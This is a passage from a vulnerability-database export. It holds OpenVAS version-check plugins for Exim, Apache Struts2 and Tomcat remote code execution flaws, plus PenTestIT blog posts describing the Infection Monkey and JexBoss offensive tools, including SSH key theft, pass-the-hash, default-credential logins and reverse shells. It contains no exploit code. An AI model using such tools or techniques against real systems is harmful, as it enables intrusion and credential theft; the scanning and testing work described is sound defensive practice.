isdpkgvuln(pkg:\"exim4-config\", ver:\"4.69-2ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.69-2ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-18T11:05:19", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1032-1", "cvss3": {}, "published": "2010-12-28T00:00:00", "type": "openvas", "title": "Ubuntu Update for exim4 vulnerability USN-1032-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-4344"], "modified": "2018-01-17T00:00:00", "id": "OPENVAS:1361412562310840554", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840554", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1032_1.nasl 8440 2018-01-17 07:58:46Z teissa $\n#\n# Ubuntu Update for exim4 vulnerability USN-1032-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Sergey Kononenko and Eugene Bujak discovered that Exim did not correctly\n truncate string expansions. A remote attacker could send specially crafted\n email traffic to run arbitrary code as the Exim user, which could also\n lead to root privileges.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1032-1\";\ntag_affected = \"exim4 vulnerability on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 9.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1032-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840554\");\n script_version(\"$Revision: 8440 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 08:58:46 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-28 07:11:56 +0100 (Tue, 28 Dec 2010)\");\n script_xref(name: \"USN\", value: \"1032-1\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-4344\");\n script_name(\"Ubuntu Update for exim4 vulnerability USN-1032-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.69-11ubuntu4.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.69-11ubuntu4.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.69-11ubuntu4.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.69-11ubuntu4.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.69-11ubuntu4.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.69-11ubuntu4.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.69-11ubuntu4.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.69-11ubuntu4.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.69-11ubuntu4.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.69-11ubuntu4.1\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.60-3ubuntu3.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.60-3ubuntu3.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.60-3ubuntu3.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.60-3ubuntu3.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.60-3ubuntu3.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.60-3ubuntu3.2\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.69-2ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.69-2ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.69-2ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.69-2ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.69-2ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.69-2ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.69-2ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.69-2ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.69-2ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.69-2ubuntu0.2\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-09T17:44:50", "description": "It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Apache Struts2 S2-057 Remote Code Execution Vulnerability in Some Huawei Products (huawei-sa-20181121-01-struts2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108792", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108792", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108792\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2018-11776\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Apache Struts2 S2-057 Remote Code Execution Vulnerability in Some Huawei Products (huawei-sa-20181121-01-struts2)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn't set for a result defined in underlying configurations and in same time, its upper package configuration have no or wildcard namespace and same possibility when using url tag which doesn't have value and action set and in same time, its upper package configuration have no or wildcard namespace.\");\n\n script_tag(name:\"insight\", value:\"It is possible to perform a RCE attack when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then namespace value isn't set for a result defined in underlying configurations and in same time, its upper package configuration have no or wildcard namespace and same possibility when using url tag which doesn't have value and action set and in same time, its upper package configuration have no or wildcard namespace. (Vulnerability ID: HWPSIRT-2018-08200)This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2018-11776.Huawei has released software updates to fix this vulnerability. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this vulnerability to perform a remote code execution attack\");\n\n script_tag(name:\"affected\", value:\"Seco VSM versions V200R002C00\n\neLog versions V200R005C00 V200R006C10 V200R007C00SPC100\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20181121-01-struts2-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:52", "description": "This host is installed with Apache Tomcat\n and is prone to code execution vulnerability.", "cvss3": {}, "published": "2017-06-28T00:00:00", "type": "openvas", "title": "Apache Tomcat 'JmxRemoteLifecycleListener' Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-8735"], "modified": "2019-05-10T00:00:00", "id": "OPENVAS:1361412562310810966", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810966", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_tomcat_rce_vuln_jun17.nasl 71279 2017-06-28 16:34:52Z jun$\n#\n# Apache Tomcat 'JmxRemoteLifecycleListener' Remote Code Execution Vulnerability\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810966\");\n script_version(\"2019-05-10T11:41:35+0000\");\n script_cve_id(\"CVE-2016-8735\");\n script_bugtraq_id(94463);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-10 11:41:35 +0000 (Fri, 10 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-28 17:04:45 +0530 (Wed, 28 Jun 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Apache Tomcat 'JmxRemoteLifecycleListener' Remote Code Execution Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apache Tomcat\n and is prone to code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an unspecified error in\n 'JmxRemoteLifecycleListener'.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Apache Tomcat before 6.0.48, 7.x before\n 7.0.73, 8.x before 8.0.39, 8.5.x before 8.5.7, and 9.x before 9.0.0.M12.\n Note:This issue exists if JmxRemoteLifecycleListener is used and an attacker\n can reach JMX ports.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 6.0.48, or 7.0.73 or\n 8.0.39 or 8.5.8 or 9.0.0.M13 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/oss-sec/2016/q4/502\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\");\n script_mandatory_keys(\"apache/tomcat/detected\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\ninclude(\"revisions-lib.inc\");\n\nif(isnull(tomPort = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:tomPort, exit_no_version:TRUE))\n exit(0);\n\nappVer = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:appVer, test_version:\"6.0.48\")){\n fix = \"6.0.48\";\n}\nelse if(appVer =~ \"^7\\.\")\n{\n if(revcomp(a: appVer, b: \"7.0.73\") < 0){\n fix = \"7.0.73\";\n }\n}\nelse if(appVer =~ \"^8\\.5\\.\")\n{\n if(revcomp(a: appVer, b: \"8.5.8\") < 0){\n fix = \"8.5.8\";\n }\n}\nelse if(appVer =~ \"^8\\.\")\n{\n if(revcomp(a: appVer, b: \"8.0.39\") < 0){\n fix = \"8.0.39\";\n }\n}\nelse if(appVer =~ \"^9\\.\")\n{\n if(revcomp(a: appVer, b: \"9.0.0.M13\") < 0){\n fix = \"9.0.0-M13\";\n }\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:tomPort);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:27", "description": "This host is running Apache Struts and is\n prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2018-08-23T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310813786", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813786", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:struts\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813786\");\n script_version(\"2019-05-17T10:45:27+0000\");\n script_cve_id(\"CVE-2018-11776\");\n script_bugtraq_id(105125);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-17 10:45:27 +0000 (Fri, 17 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-08-23 12:45:43 +0530 (Thu, 23 Aug 2018)\");\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057)\");\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_struts_detect.nasl\");\n script_mandatory_keys(\"ApacheStruts/installed\");\n script_require_ports(\"Services/www\", 8080);\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is\n prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions\n when namespace value isn't set for a result defined in underlying configurations\n and in same time, its upper action(s) configurations have no or wildcard\n namespace. Same possibility when using url tag which doesn't have value and\n action set and in same time, its upper action(s) configurations have no or\n wildcard namespace.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attacker to possibly conduct remote code on the affected application.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34,\n and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or\n 2.5.17 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!appPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:appPort, exit_no_version:TRUE)) exit(0);\nappVer = infos['version'];\npath = infos['location'];\n\nif(version_in_range(version:appVer, test_version:\"2.3\", test_version2:\"2.3.34\")){\n fix = \"2.3.35\";\n}\nelse if(version_in_range(version:appVer, test_version:\"2.5\", test_version2:\"2.5.16\")){\n fix = \"2.5.17\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:appPort);\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "pentestit": [{"lastseen": "2018-12-03T23:18:27", "description": "PenTestIT RSS Feed\n\nI'm sure you must have read my previous post title the [List of Adversary Emulation Tools](<http://pentestit.com/adversary-emulation-tools-list/>). In that post, I briefly mentioned about the Guardicore Infection Monkey. Good news now is that it has been updated! We now have **Infection Monkey 1.6.1**. An important change about this version is that this is an AWS only version.\n\n[](< http://pentestit.com/update-infection-monkey-1-6-1/>) \n\n\nWhat is Infection Monkey?\n\n> The Infection Monkey is an open source Breach and Attack Simulation (BAS) tool that assesses the resiliency of private and public cloud environments to post-breach attacks and lateral movement. It operates in much the same way a real attacker would - starting from a random location in the network and propagating from there, while looking for all possible paths of exploitation.\n\n## Infection Monkey 1.6.1 Changes:\n\nInfection Monkey 1.6.1 has now been integrated with the AWS Security Hub. This allows anyone to verify and test the resilience of their AWS environment and correlate this information with the native security solutions and benchmark score!\n\nAdditionally, I missed posting about another release - **Infection Monkey 1.6** which is also important. Hence, I'm posting about it here:\n\n## Infection Monkey 1.6 Change Log:\n\n**New Features:**\n\n * Detect cross segment traffic! The Monkey can now easily test whether two network segments are properly separated. PR [#120](<https://github.com/guardicore/monkey/pull/120>).\n * The Monkey can analyse your domain for possible Pass the Hash attacks. By cross referencing information collected by Mimikatz, the Monkey can now detect usage of identical passwords, cached logins with access to critical servers and more. [#170](<https://github.com/guardicore/monkey/pull/170>)\n * SSH key stealing. The monkey will now steal accessible SSH keys and use them when connecting to SSH servers, PR [#138](<https://github.com/guardicore/monkey/pull/138>).\n * Implement a cross platform attack for [Struts2 Multi-part file upload vulnerability](<https://cwiki.apache.org/confluence/display/WW/S2-045>), PR [#179](<https://github.com/guardicore/monkey/pull/179>).\n * Implement a cross platform attack for Oracle Web Logic CVE-2017-10271, PR [#180](<https://github.com/guardicore/monkey/pull/180>).\n * ElasticGroovy attack now supports Windows victims, PR [#181](<https://github.com/guardicore/monkey/pull/181>).\n * Hadoop cluster RCE - Abuse unauthenticated access to YARN resource manager, PR [#182](<https://github.com/guardicore/monkey/pull/182>).\n\n**Code improvements:**\n\n * We've refactored the codebase, so now it's easier to share code between the Monkey and the Monkey Island components. PR [#145](<https://github.com/guardicore/monkey/pull/145>).\n * Mimikatz is now bundled into a password protected ZIP file and extracted only if required. Makes deployment easier with AV software. PR [#169](<https://github.com/guardicore/monkey/pull/169>).\n * Monkey Island now properly logs itself to a file and console. So if you got bugs, it'll now be easier to figure them out. PR [#139](<https://github.com/guardicore/monkey/pull/139>).\n * Systemd permissions are now properly locked down\n * Fixed a situation where a successful shellshock attack could freeze the attacking Monkey. [#200](<https://github.com/guardicore/monkey/pull/200>)\n\nIn other words, the Monkey can now detect potential attack paths between computers within the same domain or workgroup using credentials reuse, pass-the-hash technique and cached logins. In addition to the already existing attacks, Infection Monkey 1.6.1 now includes support for the Struts2 Multipart file upload vulnerability (CVE-2017-5638), Oracle WebLogic Server WLS Security component vulnerability (CVE-2017-10271), Elasticsearch Groovy attack (CVE 2015-1427) & the Hadoop YARN Resource Manager remote code execution vulnerability.\n\nLot's of exciting stuff from the guys at Guardicore Labs. Really good work!\n\n## Download Infection Monkey 1.6.1:\n\nThe following Infection Monkey 1.6.1 files are available for download:\n\n 1. infection_monkey_1.6.1_AWS_only.zip\n 2. infection_monkey_1.6.1_AWS_only.tar.gz\n\nGet them **[here](<https://github.com/guardicore/monkey/releases/tag/infection_monkey_1.6.1_AWS_only>)**.\n\nThe post [UPDATE: Infection Monkey 1.6.1](<http://pentestit.com/update-infection-monkey-1-6-1/>) appeared first on [PenTestIT](<http://pentestit.com>).", "cvss3": {}, "published": "2018-12-03T22:28:53", "type": "pentestit", "title": "UPDATE: Infection Monkey 1.6.1", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638"], "modified": "2018-12-03T22:28:53", "id": "PENTESTIT:F5DFB26B34C75683830E664CBD58178F", "href": "http://pentestit.com/update-infection-monkey-1-6-1/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-08-11T08:07:48", "description": "PenTestIT RSS Feed\n\nI was working with a customers Red Hat JBoss server today and wanted to test for affected deserialization vulnerabilities. Though my favourite go-to tool - the Burp Suite has many extensions, I wanted to try something that I had not before. That's when I stumbled across **JexBoss**, which turned out to be a pretty decent [open source](<http://pentestit.com/tag/open-source/>) tool. I think _JexBoss_ is a play on Java EXploitation like a Boss wording.\n\n\n\n## What is JexBoss?\n\nJexBoss is an open source tool in Python to help you exploit and verify Java and Red Hat JBoss deserialization vulnerabilities. As we all know, serialization converts and objects state to a byte stream so that a copy of the same object can be obtained by reverting the byte stream itself. Presumably, to deserialize is to reverse serialization, ie. taking the serialized data to rebuild it into the original object. This problem is trivial in Java as there are no checks on the classes that can be deserialized.\n\n## Features of JexBoss:\n\nThe tool and exploits were developed and tested for:\n\n * JBoss Application Server versions: 3, 4, 5 and 6.\n * Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), DNS gadget, Remote JMX (CVE-2016-3427, CVE-2016-8735), Apache Struts2 Jakarta Multipart parser CVE-2017-5638, etc.)\n * Supported exploitation vectors are: \n * /_admin-console_: Tested and working in JBoss versions 5 and 6.\n * /_jmx-console_: Tested and working in JBoss versions 4, 5 and 6.\n * /_jmx-console_/_HtmlAdaptor_: Tested and working in JBoss versions 4, 5 and 6.\n * /_web-console_/_Invoker_: Tested and working in JBoss versions 4, 5 and 6.\n * /_invoker_/_JMXInvokerServlet_: Tested and working in JBoss versions 4, 5 and 6.\n * Application Deserialization: Tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters.\n * Servlet Deserialization: Tested and working against multiple java applications, platforms, etc, via servlets that process serialized objects.\n * Apache Struts2 Jakarta Multipart ([CVE-2017-5638](<http://pentestit.com/tag/CVE-2017-5638/>)): Tested against Apache Struts 2 applications.\n * Tries to authenticate to /_admin-console_/_login.seam_ using default user name and password - admin:admin.\n * Sends exploits with proper headers alternating with random User-Agent string.\n * Proxy support.\n * Auto scan and file scan modes.\n\nWith the auto scan and file scan modes, you can leverage this tool to launch a mass-scan against your own network in a short duration of time. Additionally, a payload also allows you to gain access to a reverse shell with Metasploit meterpreter support. Another good news is that it JexBoss is Python 2 & Python 3 compatible. It also includes an auto-updater.\n\n## Download JexBoss:\n\nAs always, the current version - JexBoss version 1.2.4 - can be obtained by checking out the GIT repository from [**here**](<https://github.com/joaomatosf/jexboss>).\n\nThe post [JexBoss: Java Deserialization Verification & EXploitation Tool!](<http://pentestit.com/jexboss-java-deserialization-verification-exploitation-tool/>) appeared first on [PenTestIT](<http://pentestit.com>).", "cvss3": {}, "published": "2017-08-11T06:52:45", "title": "JexBoss: Java Deserialization Verification & 